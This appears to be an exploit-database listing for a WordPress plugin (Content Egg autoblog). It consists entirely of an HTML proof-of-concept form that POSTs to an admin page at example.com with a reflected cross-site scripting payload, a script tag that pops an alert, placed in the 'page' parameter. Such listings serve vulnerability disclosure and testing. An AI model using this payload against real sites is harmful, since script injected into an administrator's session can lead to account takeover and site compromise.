Share
## https://sploitus.com/exploit?id=WPEX-ID:071A2F69-9CD6-42A8-A56C-264A589784AB
<html>
    <form action="https://example.com/wp-admin/admin.php?page=content-egg-autoblog" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>